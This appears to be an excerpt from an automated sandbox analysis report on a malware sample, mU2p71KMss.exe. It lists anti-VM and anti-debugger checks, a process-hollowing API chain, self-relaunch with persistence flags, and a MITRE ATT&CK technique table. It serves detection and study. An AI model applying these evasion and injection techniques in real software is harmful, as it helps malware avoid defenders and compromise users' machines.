          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Y
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: mU2p71KMss.exe, 00000001.00000003.2003059893.0000000000915000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000002.2009528237.0000000000915000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000770000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000770000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000770000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000003.2036117451.0000000000755000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243271467.0000000000754000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167737364.0000000000746000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167918166.00000000007A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: mU2p71KMss.exe, 00000001.00000002.2009528237.00000000008B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
          Source: mU2p71KMss.exe, 0000000D.00000002.2252580072.00000000006B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: mU2p71KMss.exe, 00000005.00000002.2025188604.0000000000770000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024457872.0000000000770000.00000004.00000020.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000003.2024120427.0000000000770000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW|R~
          Source: C:\Users\user\Desktop\mU2p71KMss.exeAPI call chain: ExitProcess graph end nodegraph_1-45023
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_0438971C rdtsc 0_2_0438971C
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_0040A3A4 IsDebuggerPresent,0_2_0040A3A4
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0042A57A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,1_2_00412220
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_043880A3 push dword ptr fs:[00000030h]0_2_043880A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD0042 push dword ptr fs:[00000030h]0_2_05DD0042
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_044A70A3 push dword ptr fs:[00000030h]4_2_044A70A3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 4_2_05DE0042 push dword ptr fs:[00000030h]4_2_05DE0042
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_00405A52 GetProcessHeap,0_2_00405A52
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_0040A32F SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A32F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004329EC
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_004329BB SetUnhandledExceptionFilter,1_2_004329BB
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_004329EC
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 5_2_004329BB SetUnhandledExceptionFilter,5_2_004329BB

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DD0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_05DD0110
          Source: C:\Users\user\Desktop\mU2p71KMss.exeMemory written: C:\Users\user\Desktop\mU2p71KMss.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeMemory written: C:\Users\user\Desktop\mU2p71KMss.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeMemory written: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeMemory written: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeMemory written: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe"
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_05DF80F6 cpuid 0_2_05DF80F6
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_05E03F87
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_05E049EA
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_05E0394D
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_05DFC8B7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_05E10AB6
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,1_2_0043404A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,1_2_00438178
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_00440116
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004382A2
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,_GetPrimaryLen,1_2_0043834F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,1_2_00438423
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: EnumSystemLocalesW,1_2_004387C8
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,1_2_0043884E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,1_2_00432B6D
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,1_2_00432FAD
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_004335E7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,1_2_00437BB3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: EnumSystemLocalesW,1_2_00437E27
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,1_2_00437E83
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,1_2_00437F00
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,1_2_0042BF17
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,1_2_00437F83
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_05E13F87
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,4_2_05E149EA
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,4_2_05E1394D
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,4_2_05E0C8B7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_05E20AB6
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_0043404A
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,5_2_00438178
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_00440116
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_004382A2
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,_GetPrimaryLen,5_2_0043834F
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,5_2_00438423
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: EnumSystemLocalesW,5_2_004387C8
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: GetLocaleInfoW,5_2_0043884E
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,5_2_00432B6D
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_00432FAD
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_004335E7
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,5_2_00437BB3
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: EnumSystemLocalesW,5_2_00437E27
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,5_2_00437E83
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,5_2_00437F00
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,5_2_0042BF17
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,5_2_00437F83
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_00409DFB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00409DFB
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_0042FE47
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Native API
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          1
          Deobfuscate/Decode Files or Information
          OS Credential Dumping2
          System Time Discovery
          Remote Services11
          Archive Collected Data
          2
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium2
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts3
